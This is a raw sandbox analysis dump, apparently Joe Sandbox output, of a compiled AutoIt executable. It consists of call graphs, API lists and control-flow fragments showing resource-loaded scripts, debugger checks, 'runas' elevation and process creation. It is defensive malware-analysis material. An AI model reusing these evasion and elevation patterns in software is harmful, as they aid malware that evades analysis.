SetEvent ResetEvent 96566->96694 96700 7ff6bb1b8d98 49 API calls Concurrency::wait 96566->96700 96567->96534 96574->96534 96575->96534 96576->96532 96577->96534 96578->96520 96580 7ff6bb1a5ba5 96579->96580 96581 7ff6bb1a5be5 FindClose 96580->96581 96582 7ff6bb1a5bd5 96580->96582 96583 7ff6bb1a5ba9 96580->96583 96581->96583 96582->96583 96702 7ff6bb127ab8 96582->96702 96583->96566 96586 7ff6bb1aa680 96585->96586 96593 7ff6bb1aa71a 96586->96593 96757 7ff6bb12834c 96586->96757 96589 7ff6bb1aa7fd 96750 7ff6bb1a1864 96589->96750 96590 7ff6bb12d4cc 48 API calls 96591 7ff6bb1aa6d0 96590->96591 96766 7ff6bb126838 96591->96766 96593->96589 96594 7ff6bb1aa6f3 96593->96594 96598 7ff6bb1aa770 96593->96598 96594->96566 96596 7ff6bb1aa805 96754 7ff6bb19b334 96596->96754 96713 7ff6bb12d4cc 96598->96713 96599 7ff6bb1aa6e6 96599->96594 96602 7ff6bb127ab8 CloseHandle 96599->96602 96602->96594 96603 7ff6bb1aa7ee 96732 7ff6bb19b3a8 96603->96732 96605 7ff6bb1aa7a7 96606 7ff6bb1298e8 4 API calls 96605->96606 96609 7ff6bb1aa7b5 96606->96609 96607 7ff6bb1aa778 96607->96603 96607->96605 96608 7ff6bb128314 CloseHandle 96610 7ff6bb1aa85c 96608->96610 96611 7ff6bb12e0a8 4 API calls 96609->96611 96610->96594 96613 7ff6bb127ab8 CloseHandle 96610->96613 96612 7ff6bb1aa7c2 96611->96612 96614 7ff6bb1271f8 4 API calls 96612->96614 96613->96594 96615 7ff6bb1aa7d3 96614->96615 96616 7ff6bb19b3a8 12 API calls 96615->96616 96617 7ff6bb1aa7e0 Concurrency::wait 96616->96617 96617->96594 96617->96608 96619 7ff6bb12ee20 18 API calls 96618->96619 96620 7ff6bb1af09c 96619->96620 96621 7ff6bb1a070c 6 API calls 96620->96621 96622 7ff6bb1af0a4 96621->96622 96622->96566 96823 7ff6bb1bf630 96623->96823 96627 7ff6bb1a7e79 96626->96627 96628 7ff6bb129640 4 API calls 96627->96628 96658 7ff6bb1a7f55 Concurrency::wait 96627->96658 96629 7ff6bb1a7ea6 96628->96629 96631 7ff6bb129640 4 API calls 96629->96631 96630 7ff6bb12834c 5 API calls 96632 7ff6bb1a7f99 96630->96632 96633 7ff6bb1a7eaf 96631->96633 96634 7ff6bb12d4cc 48 API calls 96632->96634 96635 7ff6bb12d4cc 48 API calls 96633->96635 96636 7ff6bb1a7fab 96634->96636 96637 7ff6bb1a7ebe 96635->96637 96638 7ff6bb126838 16 API calls 96636->96638 96904 7ff6bb1274ac RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 96637->96904 96640 7ff6bb1a7fba 96638->96640 96642 7ff6bb1a7fbe GetLastError 96640->96642 96646 7ff6bb1a7ff5 96640->96646 96641 7ff6bb1a7ed8 96643 7ff6bb127c24 4 API calls 96641->96643 96644 7ff6bb1a7fd8 96642->96644 96645 7ff6bb1a7f07 96643->96645 96649 7ff6bb127ab8 CloseHandle 96644->96649 96652 7ff6bb1a7fe5 96644->96652 96645->96658 96905 7ff6bb19bdd4 lstrlenW GetFileAttributesW FindFirstFileW FindClose 96645->96905 96647 7ff6bb129640 4 API calls 96646->96647 96650 7ff6bb1a8035 96647->96650 96649->96652 96650->96652 96907 7ff6bb190d38 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 96650->96907 96651 7ff6bb1a7f17 96653 7ff6bb1a7f1b 96651->96653 96651->96658 96652->96566 96655 7ff6bb12ec00 4 API calls 96653->96655 96656 7ff6bb1a7f28 96655->96656 96906 7ff6bb19bab8 8 API calls Concurrency::wait 96656->96906 96658->96630 96658->96652 96659 7ff6bb1a7f31 Concurrency::wait 96659->96658 96661 7ff6bb1aa680 96660->96661 96662 7ff6bb12834c 5 API calls 96661->96662 96668 7ff6bb1aa71a 96661->96668 96663 7ff6bb1aa6be 96662->96663 96665 7ff6bb12d4cc 48 API calls 96663->96665 96664 7ff6bb1aa7fd 96667 7ff6bb1a1864 6 API calls 96664->96667 96666 7ff6bb1aa6d0 96665->96666 96670 7ff6bb126838 16 API calls 96666->96670 96671 7ff6bb1aa805 96667->96671 96668->96664 96669 7ff6bb1aa6f3 96668->96669 96673 7ff6bb1aa770 96668->96673 96669->96566 96672 7ff6bb1aa6e2 96670->96672 96676 7ff6bb19b334 4 API calls 96671->96676 96672->96668 96674 7ff6bb1aa6e6 96672->96674 96675 7ff6bb12d4cc 48 API calls 96673->96675 96674->96669 96677 7ff6bb127ab8 CloseHandle 96674->96677 96682 7ff6bb1aa778 96675->96682 96692 7ff6bb1aa7e0 Concurrency::wait 96676->96692 96677->96669 96678 7ff6bb1aa7ee 96679 7ff6bb19b3a8 12 API calls 96678->96679 96679->96692 96680 7ff6bb1aa7a7 96681 7ff6bb1298e8 4 API calls 96680->96681 96684 7ff6bb1aa7b5 96681->96684 96682->96678 96682->96680 96683 7ff6bb128314 CloseHandle 96685 7ff6bb1aa85c 96683->96685 96686 7ff6bb12e0a8 4 API calls 96684->96686 96685->96669 96688 7ff6bb127ab8 CloseHandle 96685->96688 96687 7ff6bb1aa7c2 96686->96687 96689 7ff6bb1271f8 4 API calls 96687->96689 96688->96669 96690 7ff6bb1aa7d3 96689->96690 96691 7ff6bb19b3a8 12 API calls 96690->96691 96691->96692 96692->96669 96692->96683 96695->96558 96696->96558 96697->96544 96698->96567 96699->96567 96700->96566 96701->96567 96705 7ff6bb1282e4 96702->96705 96710 7ff6bb128314 96705->96710 96707 7ff6bb1282f2 Concurrency::wait 96708 7ff6bb128314 CloseHandle 96707->96708 96709 7ff6bb128303 96708->96709 96711 7ff6bb12833d CloseHandle 96710->96711 96712 7ff6bb12832a 96710->96712 96711->96712 96712->96707 96714 7ff6bb12d50b 96713->96714 96715 7ff6bb12d4f2 96713->96715 96716 7ff6bb12d53e 96714->96716 96717 7ff6bb12d513 96714->96717 96715->96607 96719 7ff6bb179cc4 96716->96719 96722 7ff6bb12d550 96716->96722 96726 7ff6bb179bbc 96716->96726 96782 7ff6bb14956c 31 API calls 96717->96782 96785 7ff6bb149538 31 API calls 96719->96785 96721 7ff6bb12d522 96727 7ff6bb12ec00 4 API calls 96721->96727 96783 7ff6bb144834 46 API calls 96722->96783 96723 7ff6bb179cdc 96728 7ff6bb144c68 4 API calls 96726->96728 96731 7ff6bb179c3e Concurrency::wait wcscpy 96726->96731 96727->96715 96729 7ff6bb179c0a 96728->96729 96730 7ff6bb12ec00 4 API calls 96729->96730 96730->96731 96784 7ff6bb144834 46 API calls 96731->96784 96733 7ff6bb19b3c8 96732->96733 96734 7ff6bb19b42a 96732->96734 96735 7ff6bb19b41e 96733->96735 96736 7ff6bb19b3d0 96733->96736 96737 7ff6bb19b334 4 API calls 96734->96737 96793 7ff6bb19b458 8 API calls 96735->96793 96739 7ff6bb19b3f1 96736->96739 96740 7ff6bb19b3dd 96736->96740 96749 7ff6bb19b410 Concurrency::wait 96737->96749 96791 7ff6bb12a368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 96739->96791 96789 7ff6bb12a368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 96740->96789 96743 7ff6bb19b3f6 96792 7ff6bb19b270 6 API calls 96743->96792 96744 7ff6bb19b3e2 96790 7ff6bb144120 6 API calls 96744->96790 96747 7ff6bb19b3ef 96786 7ff6bb19b384 96747->96786 96749->96617 96751 7ff6bb1a1873 96750->96751 96752 7ff6bb1a1878 96750->96752 96794 7ff6bb1a070c 96751->96794 96752->96596 96815 7ff6bb19b188 96754->96815 96758 7ff6bb144c68 4 API calls 96757->96758 96759 7ff6bb128363 96758->96759 96760 7ff6bb128314 CloseHandle 96759->96760 96761 7ff6bb12836f 96760->96761 96762 7ff6bb129640 4 API calls 96761->96762 96763 7ff6bb128378 96762->96763 96764 7ff6bb128314 CloseHandle 96763->96764 96765 7ff6bb128380 96764->96765 96765->96590 96767 7ff6bb128314 CloseHandle 96766->96767 96768 7ff6bb12685a 96767->96768 96769 7ff6bb16caa8 96768->96769 96770 7ff6bb12687d CreateFileW 96768->96770 96771 7ff6bb16caae CreateFileW 96769->96771 96778 7ff6bb1268d9 96769->96778 96775 7ff6bb1268ab 96770->96775 96773 7ff6bb16cae6 96771->96773 96771->96775 96772 7ff6bb1268e4 96772->96593 96772->96599 96822 7ff6bb126a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96773->96822 96775->96772 96820 7ff6bb1268f4 9 API calls 96775->96820 96776 7ff6bb16caf3 96776->96775 96778->96772 96781 7ff6bb19b334 4 API calls 96778->96781 96779 7ff6bb1268c1 96779->96778 96821 7ff6bb126a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96779->96821 96781->96772 96782->96721 96783->96721 96784->96719 96785->96723 96787 7ff6bb19b334 4 API calls 96786->96787 96788 7ff6bb19b399 96787->96788 96788->96749 96789->96744 96790->96747 96791->96743 96792->96747 96793->96749 96795 7ff6bb1a072e 96794->96795 96812 7ff6bb1a0768 memcpy_s Concurrency::wait 96794->96812 96797 7ff6bb1a074a 96795->96797 96798 7ff6bb1a0773 96795->96798 96799 7ff6bb1a07a4 96795->96799 96796 7ff6bb144c68 4 API calls 96796->96812 96797->96798 96800 7ff6bb1a0759 96797->96800 96798->96796 96801 7ff6bb144c68 4 API calls 96799->96801 96806 7ff6bb1a07c2 96799->96806 96808 7ff6bb144c68 4 API calls 96800->96808 96801->96806 96802 7ff6bb1a07fc 96805 7ff6bb144c68 4 API calls 96802->96805 96803 7ff6bb1a07ec 96804 7ff6bb144c68 4 API calls 96803->96804 96804->96812 96807 7ff6bb1a0807 96805->96807 96806->96802 96806->96803 96806->96812 96813 7ff6bb13f380 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 96807->96813 96808->96812 96810 7ff6bb1a0817 96814 7ff6bb144120 6 API calls 96810->96814 96812->96752 96813->96810 96814->96812 96816 7ff6bb19b193 96815->96816 96817 7ff6bb19b19c WriteFile 96815->96817 96819 7ff6bb19b208 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96816->96819 96817->96617 96819->96817 96820->96779 96821->96778 96822->96776 96825 7ff6bb1bf671 memcpy_s 96823->96825 96824 7ff6bb12d4cc 48 API calls 96826 7ff6bb1bf74d 96824->96826 96825->96824 96891 7ff6bb12e330 96826->96891 96828 7ff6bb1bf759 96829 7ff6bb1bf840 96828->96829 96830 7ff6bb1bf762 96828->96830 96831 7ff6bb1bf87d GetCurrentDirectoryW 96829->96831 96833 7ff6bb12d4cc 48 API calls 96829->96833 96832 7ff6bb12d4cc 48 API calls 96830->96832 96834 7ff6bb144c68 4 API calls 96831->96834 96835 7ff6bb1bf777 96832->96835 96836 7ff6bb1bf85c 96833->96836 96837 7ff6bb1bf8a7 GetCurrentDirectoryW 96834->96837 96838 7ff6bb12e330 4 API calls 96835->96838 96839 7ff6bb12e330 4 API calls 96836->96839 96840 7ff6bb1bf8b5 96837->96840 96841 7ff6bb1bf783 96838->96841 96851 7ff6bb1bf868 96839->96851 96842 7ff6bb1bf8f0 96840->96842 96895 7ff6bb13f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 96840->96895 96843 7ff6bb12d4cc 48 API calls 96841->96843 96850 7ff6bb1bf905 96842->96850 96854 7ff6bb1bf901 96842->96854 96845 7ff6bb1bf798 96843->96845 96847 7ff6bb12e330 4 API calls 96845->96847 96846 7ff6bb1bf8d0 96896 7ff6bb13f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 96846->96896 96849 7ff6bb1bf7a4 96847->96849 96853 7ff6bb12d4cc 48 API calls 96849->96853 96898 7ff6bb19fddc 8 API calls 96850->96898 96851->96831 96851->96842 96852 7ff6bb1bf8e0 96897 7ff6bb13f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 96852->96897 96859 7ff6bb1bf7b9 96853->96859 96856 7ff6bb1bfa0f CreateProcessW 96854->96856 96857 7ff6bb1bf972 96854->96857 96888 7ff6bb1bf9b4 96856->96888 96901 7ff6bb18d1f8 99 API calls 96857->96901 96862 7ff6bb12e330 4 API calls 96859->96862 96860 7ff6bb1bf90e 96899 7ff6bb19fca8 8 API calls 96860->96899 96864 7ff6bb1bf7c5 96862->96864 96866 7ff6bb1bf806 GetSystemDirectoryW 96864->96866 96868 7ff6bb12d4cc 48 API calls 96864->96868 96865 7ff6bb1bf926 96900 7ff6bb19fafc 8 API calls ~SyncLockT 96865->96900 96870 7ff6bb144c68 4 API calls 96866->96870 96871 7ff6bb1bf7e1 96868->96871 96869 7ff6bb1bf94f 96869->96854 96872 7ff6bb1bf830 GetSystemDirectoryW 96870->96872 96874 7ff6bb12e330 4 API calls 96871->96874 96872->96840 96873 7ff6bb1bfabe CloseHandle 96876 7ff6bb1bfaf5 96873->96876 96877 7ff6bb1bfacc 96873->96877 96875 7ff6bb1bf7ed 96874->96875 96875->96840 96875->96866 96879 7ff6bb1bfafe 96876->96879 96883 7ff6bb1bfb26 CloseHandle 96876->96883 96902 7ff6bb19f7dc CloseHandle ~SyncLockT 96877->96902 96887 7ff6bb1bfaa3 96879->96887 96881 7ff6bb1bfa64 96884 7ff6bb1bfa84 GetLastError 96881->96884 96883->96887 96884->96887 96903 7ff6bb19f51c CloseHandle ~SyncLockT 96887->96903 96888->96873 96888->96881 96889 7ff6bb1bf0c2 96889->96566 96892 7ff6bb12e342 96891->96892 96893 7ff6bb144c68 4 API calls 96892->96893 96894 7ff6bb12e361 wcscpy 96893->96894 96894->96828 96895->96846 96896->96852 96897->96842 96898->96860 96899->96865 96900->96869 96901->96888 96903->96889 96904->96641 96905->96651 96906->96659 96907->96652 96908 7ff6bb17e263 96909 7ff6bb17e271 96908->96909 96919 7ff6bb132680 96908->96919 96909->96909 96910 7ff6bb1329c8 PeekMessageW 96910->96919 96911 7ff6bb1326da GetInputState 96911->96910 96911->96919 96913 7ff6bb17d181 TranslateAcceleratorW 96913->96919 96914 7ff6bb132a1f TranslateMessage DispatchMessageW 96915 7ff6bb132a33 PeekMessageW 96914->96915 96915->96919 96916 7ff6bb1328b9 timeGetTime 96916->96919 96917 7ff6bb17d2bb timeGetTime 96992 7ff6bb142ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 96917->96992 96919->96910 96919->96911 96919->96913 96919->96914 96919->96915 96919->96916 96919->96917 96923 7ff6bb1366c0 300 API calls 96919->96923 96924 7ff6bb132856 96919->96924 96925 7ff6bb133c20 300 API calls 96919->96925 96926 7ff6bb1a34e4 77 API calls 96919->96926 96928 7ff6bb132b70 96919->96928 96935 7ff6bb132e30 96919->96935 96991 7ff6bb142de8 IsDialogMessageW GetClassLongPtrW 96919->96991 96993 7ff6bb1a3a28 18 API calls 96919->96993 96994 7ff6bb1ba320 300 API calls Concurrency::wait 96919->96994 96923->96919 96925->96919 96926->96919 96929 7ff6bb132b96 96928->96929 96931 7ff6bb132ba9 96928->96931 96995 7ff6bb132050 301 API calls memcpy_s 96929->96995 96996 7ff6bb1a34e4 77 API calls 3 library calls 96931->96996 96932 7ff6bb132b9e 96932->96919 96934 7ff6bb17e55c 96936 7ff6bb132e90 96935->96936 96937 7ff6bb133c20 300 API calls 96936->96937 96938 7ff6bb132ee6 96936->96938 96939 7ff6bb17e581 96937->96939 96950 7ff6bb132f71 96938->96950 97014 7ff6bb145114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96938->97014 96939->96938 97013 7ff6bb1a34e4 77 API calls 3 library calls 96939->97013 96944 7ff6bb129640 4 API calls 96944->96950 96945 7ff6bb17f197 97026 7ff6bb1a34e4 77 API calls 3 library calls 96945->97026 96950->96944 96962 7ff6bb133169 96950->96962 96989 7ff6bb1331e5 96950->96989 97015 7ff6bb145114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96950->97015 97016 7ff6bb144f0c 34 API calls _onexit 96950->97016 97017 7ff6bb1450b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96950->97017 96952 7ff6bb12eff8 46 API calls 96952->96989 96956 7ff6bb17f1d9 96959 7ff6bb17f206 96956->96959 96965 7ff6bb17f21b 96956->96965 96975 7ff6bb1332f3 96956->96975 96997 7ff6bb1a08b4 96956->96997 96958 7ff6bb133b37 97012 7ff6bb128444 300 API calls 96958->97012 97027 7ff6bb13e65c 36 API calls 96959->97027 96960 7ff6bb17f245 96967 7ff6bb13318a 96962->96967 96962->96989 97018 7ff6bb1a34e4 77 API calls 3 library calls 96962->97018 97028 7ff6bb13e6bc 36 API calls 96965->97028 96968 7ff6bb17e926 96967->96968 96970 7ff6bb133c20 300 API calls 96967->96970 96971 7ff6bb17e9ba 96967->96971 96967->96975 96979 7ff6bb17eb0c 96967->96979 96986 7ff6bb17eb1c 96967->96986 96967->96989 97008 7ff6bb135700 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 96967->97008 97021 7ff6bb1ba320 300 API calls Concurrency::wait 96967->97021 97019 7ff6bb1b79d8 98 API calls Concurrency::wait 96968->97019 96970->96967 97022 7ff6bb1a34e4 77 API calls 3 library calls 96971->97022 96972 7ff6bb133c20 300 API calls 96972->96989 96975->96919 96977 7ff6bb17e949 96977->96975 97020 7ff6bb1a34e4 77 API calls 3 library calls 96977->97020 97023 7ff6bb1a34e4 77 API calls 3 library calls 96979->97023 96982 7ff6bb1a34e4 77 API calls 96982->96989 96984 7ff6bb17f095 97025 7ff6bb1a34e4 77 API calls 3 library calls 96984->97025 96986->96975 97024 7ff6bb1a34e4 77 API calls 3 library calls 96986->97024 96988 7ff6bb1339c1 96988->96975 97011 7ff6bb12f0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 96988->97011 96989->96945 96989->96952 96989->96956 96989->96958 96989->96972 96989->96975 96989->96982 96989->96984 96989->96988 97009 7ff6bb135700 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 96989->97009 97010 7ff6bb12fc30 36 API calls 96989->97010 96991->96919 96992->96919 96993->96919 96994->96919 96995->96932 96996->96934 97004 7ff6bb1a08cb 96997->97004 97007 7ff6bb1a08f3 96997->97007 96998 7ff6bb1a08f5 97030 7ff6bb1446dc 48 API calls 96998->97030 96999 7ff6bb1a08fa 97001 7ff6bb12d4cc 48 API calls 96999->97001 97002 7ff6bb1a0902 97001->97002 97003 7ff6bb127c24 4 API calls 97002->97003 97003->97007 97004->96998 97004->96999 97005 7ff6bb1a08ee 97004->97005 97004->97007 97029 7ff6bb12fc30 36 API calls 97005->97029 97007->96959 97008->96967 97009->96989 97010->96989 97011->96975 97012->96975 97013->96938 97016->96950 97018->96967 97019->96977 97020->96975 97021->96967 97022->96975 97023->96986 97024->96975 97025->96945 97026->96956 97027->96965 97028->96960 97029->97007 97030->96999

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF6BB123785), ref: 00007FF6BB1237F2
                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF6BB123785), ref: 00007FF6BB123807
                                                                        • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF6BB123785), ref: 00007FF6BB12388D
                                                                          • Part of subcall function 00007FF6BB123F9C: GetFullPathNameW.KERNEL32(D000000000000000,00007FF6BB1238BF,?,?,?,?,?,00007FF6BB123785), ref: 00007FF6BB123FFD
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF6BB123785), ref: 00007FF6BB123924
                                                                        • MessageBoxA.USER32 ref: 00007FF6BB16B888
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF6BB123785), ref: 00007FF6BB16B8E1
                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,00007FF6BB123785), ref: 00007FF6BB16B968
                                                                        • ShellExecuteW.SHELL32 ref: 00007FF6BB16B98F
                                                                          • Part of subcall function 00007FF6BB123B84: GetSysColorBrush.USER32 ref: 00007FF6BB123B9E
                                                                          • Part of subcall function 00007FF6BB123B84: LoadCursorW.USER32 ref: 00007FF6BB123BAE
                                                                          • Part of subcall function 00007FF6BB123B84: LoadIconW.USER32 ref: 00007FF6BB123BC3
                                                                          • Part of subcall function 00007FF6BB123B84: LoadIconW.USER32 ref: 00007FF6BB123BDC
                                                                          • Part of subcall function 00007FF6BB123B84: LoadIconW.USER32 ref: 00007FF6BB123BF5
                                                                          • Part of subcall function 00007FF6BB123B84: LoadImageW.USER32 ref: 00007FF6BB123C21
                                                                          • Part of subcall function 00007FF6BB123B84: RegisterClassExW.USER32 ref: 00007FF6BB123C85
                                                                          • Part of subcall function 00007FF6BB123CBC: CreateWindowExW.USER32 ref: 00007FF6BB123D0C
                                                                          • Part of subcall function 00007FF6BB123CBC: CreateWindowExW.USER32 ref: 00007FF6BB123D5F
                                                                          • Part of subcall function 00007FF6BB123CBC: ShowWindow.USER32 ref: 00007FF6BB123D75
                                                                          • Part of subcall function 00007FF6BB126258: Shell_NotifyIconW.SHELL32 ref: 00007FF6BB126350
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                                        • String ID: This is a third-party compiled AutoIt script.$runas
                                                                        • API String ID: 1593035822-3287110873
                                                                        • Opcode ID: c3ded298cf76d34180cf113abdbd9d12434cc4ac29103e584319df50cc10e3ad
                                                                        • Instruction ID: 46831c69f5a6ccd29e92ce8a3ee5c3643c514a3960baa96812b2286b4dae186a
                                                                        • Opcode Fuzzy Hash: c3ded298cf76d34180cf113abdbd9d12434cc4ac29103e584319df50cc10e3ad
                                                                        • Instruction Fuzzy Hash: C0712D61A1C68399FA209B6CE9411FA6760FF4E348F840136E74DC61BADF7DE509C710

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 352 7ff6bb126580-7ff6bb1265fc call 7ff6bb144c68 call 7ff6bb126c98 call 7ff6bb145d00 359 7ff6bb126737-7ff6bb12673a 352->359 360 7ff6bb126602-7ff6bb126606 352->360 363 7ff6bb16c9f5-7ff6bb16c9fd call 7ff6bb1a2e00 359->363 364 7ff6bb126740-7ff6bb126753 CreateStreamOnHGlobal 359->364 361 7ff6bb12660c-7ff6bb126617 call 7ff6bb155514 360->361 362 7ff6bb16ca03-7ff6bb16ca1e 360->362 373 7ff6bb12661b-7ff6bb12664e call 7ff6bb1267d8 361->373 375 7ff6bb16ca27-7ff6bb16ca60 call 7ff6bb126810 call 7ff6bb1267d8 362->375 363->362 364->360 365 7ff6bb126759-7ff6bb126777 FindResourceExW 364->365 365->360 368 7ff6bb12677d 365->368 372 7ff6bb16c97e-7ff6bb16c991 LoadResource 368->372 372->360 376 7ff6bb16c997-7ff6bb16c9a8 SizeofResource 372->376 382 7ff6bb1266e8 373->382 383 7ff6bb126654-7ff6bb12665f 373->383 385 7ff6bb1266ee 375->385 394 7ff6bb16ca66 375->394 376->360 377 7ff6bb16c9ae-7ff6bb16c9ba LockResource 376->377 377->360 381 7ff6bb16c9c0-7ff6bb16c9f0 377->381 381->360 382->385 386 7ff6bb1266ae-7ff6bb1266b2 383->386 387 7ff6bb126661-7ff6bb12666f 383->387 391 7ff6bb1266f1-7ff6bb126715 385->391 386->382 388 7ff6bb1266b4-7ff6bb1266cf call 7ff6bb126810 386->388 392 7ff6bb126670-7ff6bb12667d 387->392 388->373 395 7ff6bb126717-7ff6bb126724 call 7ff6bb144c24 * 2 391->395 396 7ff6bb126729-7ff6bb126736 391->396 397 7ff6bb126680-7ff6bb12668f 392->397 394->391 395->396 401 7ff6bb126691-7ff6bb126695 397->401 402 7ff6bb1266d4-7ff6bb1266dd 397->402 401->375 406 7ff6bb12669b-7ff6bb1266a8 401->406 403 7ff6bb1266e3-7ff6bb1266e6 402->403 404 7ff6bb126782-7ff6bb12678c 402->404 403->401 407 7ff6bb126797-7ff6bb1267a1 404->407 408 7ff6bb12678e 404->408 406->392 410 7ff6bb1266aa 406->410 411 7ff6bb1267ce 407->411 412 7ff6bb1267a3-7ff6bb1267ad 407->412 408->407 410->386 411->372 413 7ff6bb1267c6 412->413 414 7ff6bb1267af-7ff6bb1267bb 412->414 413->411 414->397 415 7ff6bb1267c1 414->415 415->413
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                        • String ID: AU3!$EA06$SCRIPT
                                                                        • API String ID: 3051347437-2925976212
                                                                        • Opcode ID: 91e87ae7fa82639ff37275862ca6038f9445b612ea3ecf8fcd50249447f95a60
                                                                        • Instruction ID: fb6050f7cb2d95e5c03d39a6b65c8064d38cd93538fc87c91cba9100e93c69d2
                                                                        • Opcode Fuzzy Hash: 91e87ae7fa82639ff37275862ca6038f9445b612ea3ecf8fcd50249447f95a60
                                                                        • Instruction Fuzzy Hash: 3C91E172B0964186EB20CB29E454ABC37A5BB4AB88F454136DF5E87BE5DF3DE444C700

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 482 7ff6bb141d80-7ff6bb141e17 call 7ff6bb129640 GetVersionExW call 7ff6bb127cf4 487 7ff6bb189450 482->487 488 7ff6bb141e1d 482->488 490 7ff6bb189457-7ff6bb18945d 487->490 489 7ff6bb141e20-7ff6bb141e46 call 7ff6bb12dda4 488->489 496 7ff6bb141e4c 489->496 497 7ff6bb141fc1 489->497 492 7ff6bb189463-7ff6bb189480 490->492 492->492 493 7ff6bb189482-7ff6bb189485 492->493 493->489 495 7ff6bb18948b-7ff6bb189491 493->495 495->490 498 7ff6bb189493 495->498 499 7ff6bb141e53-7ff6bb141e59 496->499 497->487 501 7ff6bb189498-7ff6bb1894a1 498->501 500 7ff6bb141e5f-7ff6bb141e7c 499->500 500->500 502 7ff6bb141e7e-7ff6bb141e81 500->502 501->499 503 7ff6bb1894a7 501->503 502->501 504 7ff6bb141e87-7ff6bb141ed6 call 7ff6bb12dda4 502->504 503->497 507 7ff6bb141edc-7ff6bb141ede 504->507 508 7ff6bb189645-7ff6bb18964d 504->508 509 7ff6bb141ee4-7ff6bb141efa 507->509 510 7ff6bb1894ac-7ff6bb1894af 507->510 511 7ff6bb18964f-7ff6bb189658 508->511 512 7ff6bb18965a-7ff6bb18965d 508->512 513 7ff6bb189572-7ff6bb189579 509->513 514 7ff6bb141f00-7ff6bb141f02 509->514 515 7ff6bb141f3c-7ff6bb141f80 GetCurrentProcess IsWow64Process call 7ff6bb146240 510->515 516 7ff6bb1894b5-7ff6bb189501 510->516 517 7ff6bb189686-7ff6bb189692 511->517 512->517 518 7ff6bb18965f-7ff6bb189674 512->518 521 7ff6bb189589-7ff6bb189599 513->521 522 7ff6bb18957b-7ff6bb189584 513->522 523 7ff6bb18959e-7ff6bb1895b3 514->523 524 7ff6bb141f08-7ff6bb141f0b 514->524 529 7ff6bb18969d-7ff6bb1896b3 call 7ff6bb1932f4 515->529 539 7ff6bb141f86-7ff6bb141f8b GetSystemInfo 515->539 516->515 526 7ff6bb189507-7ff6bb18950e 516->526 517->529 519 7ff6bb18967f 518->519 520 7ff6bb189676-7ff6bb18967d 518->520 519->517 520->517 521->515 522->515 530 7ff6bb1895c3-7ff6bb1895d3 523->530 531 7ff6bb1895b5-7ff6bb1895be 523->531 527 7ff6bb141f11-7ff6bb141f2d 524->527 528 7ff6bb1895ed-7ff6bb1895f0 524->528 533 7ff6bb189510-7ff6bb189518 526->533 534 7ff6bb189534-7ff6bb18953c 526->534 535 7ff6bb1895d8-7ff6bb1895e8 527->535 536 7ff6bb141f33 